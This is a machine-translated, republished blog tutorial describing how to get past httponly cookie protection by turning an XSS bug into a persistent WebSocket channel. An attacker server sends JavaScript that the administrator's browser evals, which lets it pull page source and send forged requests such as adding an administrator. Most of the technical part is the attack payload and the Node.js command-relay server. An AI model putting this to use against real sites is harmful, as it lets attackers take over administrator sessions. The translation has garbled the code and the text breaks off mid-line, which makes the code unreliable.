Shulou(Shulou.com)05/31 Report--

How to analyze httponly Websocket source code mapping, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can get something.

Preface of 0x00

In the black box test of XSS, talking about httponly is really a headache, it protects the administrator's cookie information. The author feels that it is a very stable choice to analyze the background source code and then construct a new XSS Payload to add administrator users through Ajax. But this is to test the JavaScript level of the attacker. If you have a few more layers of interesting encryption in Js, then the attacker should decrypt it step by step and then audit the Js step by step. Moreover, the source code obtained by XSS is only one-time, and no audit to the key code is equivalent to this XSS can only pave the way for subsequent XSS. Continue XSS, continue to wait for the administrator to take the bait, construct Payload, send the Payload of XSS, and then wait for the administrator to take the bait. Think about the big head, white hat of the two lines of tears flow out. It allows you to easily send an "add administrator" XSS Payload without even having to audit Js, let alone manual Payload.

0x01 ordinary XSS to obtain source code information

Let's take a look at the Payload used by ordinary XSS to obtain source code information.

This is the author in Baidu search, you can understand that to get the source code is to send an ajax request, and then get the source code to the attacker server.

Because the HTTP protocol only sends and receives, if we want to do it once and for all (one XSS can do it), we might as well take advantage of WebSocket.

0x02 WebSocket gets multiple pages

Let's put it here and think about it carefully. If we link the administrator's browser with the attacker's server through WebSocket, we reverse our identity and let the administrator's browser act as the server of the attacker's server, and then the attacker's server asks the administrator's browser to send source code many times. Does this achieve the effect of XSS multiple pages at a time?

What? I don't understand yet. Then look at the picture below.

At this time, B is the victim of WebSocket,A, C is the attacker, and C repeatedly asks A to give me the money (source code). At this time, WebSocket becomes the identity of the middleman. It is a bridge between the victim and the attacker (TCP without the HTTP protocol).

The idea of 0x03 WebSocket Source Code Mapping

Since we can get multiple pages and we don't like to conduct Js audits (which I obviously don't like), and then construct the Payload manually, we like to feel relaxed. Then just fuzz on the source code (local fuzz wool).

Here the author a little bit against you (obviously for self-entertainment), the author first paste the mind map.

In other words, we can get multiple source information, and then introduce all the target CSS and JS through outreach, because CSS style and JS are very important to us. Then go to the local source code to see if there is a "add administrator" function, because various Js and Css have been introduced, then you can send a form request. Then we find the "add administrator" function through Fuzz and add users through fuzz, and WebSocket tells the administrator's browser, "I'm going to send an Ajax request to add an administrator." Then the administrator browser sends it. In this way, you don't even need Js audit.

Implementation of 0x04 WebSocket Source Code Mapping

Of course, it's useless for us to talk on paper. Let's do it together.

WebSocket XSS Payload:

Var ws = new WebSocket ('ws://127.0.0.1:5555/'); / / websocket of the attacker

Ws.addEventListener ('message', (data) = > {

Try {

Eval (data.data)

} catch (e) {

Console.log ('code execution error')

}

});

Here the author uses the server written by nodeJs. In fact, there is a reason, because nodeJs supports multiple ports in a file, and the second route can be freely specified, which is very comfortable. So the author uses nodeJs here.

Server code:

Let ws = require ('nodejs-websocket')

Let http = require ('http')

Let url = require ('url')

Let resStr =''

Let server = ws.createServer (connect = > {

Connect.send (createString ('GET', `' + location.href+'`))

Connect.on ('text', (data) = > {

ResStr = data

});

Connect.on ('error', () = > {})

Connect.on ('close', () = > {})

});

Server.listen (5555)

Let httpServer = http.createServer ((request, response) = > {

If (request.url = ='/ favicon.ico') {

Return

}

Response.writeHead (200,{ 'Content-Type':'text/html;charset=utf8'})

If (url.parse (request.url). Pathname = ='/ heihu577') {

Let querystring = url.parse (request.url, true)

Let cmd = querystring.query.cmd

Console.log (querystring.query)

If (cmd! ='') {

Guangbo (cmd)

}

} else if (request.method.toLowerCase () = = 'get') {

Guangbo (createString ('GET', request.url))

Response.end (resStr)

} else if (request.method.toLowerCase () = = 'post') {

Let tmpStr =''

Request.addListener ('data', (chunk) = > {

TmpStr + = chunk

});

Request.addListener ('end', ()) = > {

Guangbo (createString ('POST', request.url, tmpStr))

Response.end (resStr)

});

}

Response.end ('ok')

});

HttpServer.listen (6666)

Function guangbo (data) {

Server.connections.forEach (item = > {

Item.send (data)

});

}

Function createString (method, url, options ='') {

Switch (method) {

Case 'GET':

Str = `if = new XMLHttpRequest (); xml.open ('${method}','${url}'); xml.send (null); xml.onreadystatechange=function () {if (this.status=='200'&&this.readyState=='4') {ws.send (this.responseText.replace (/)

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.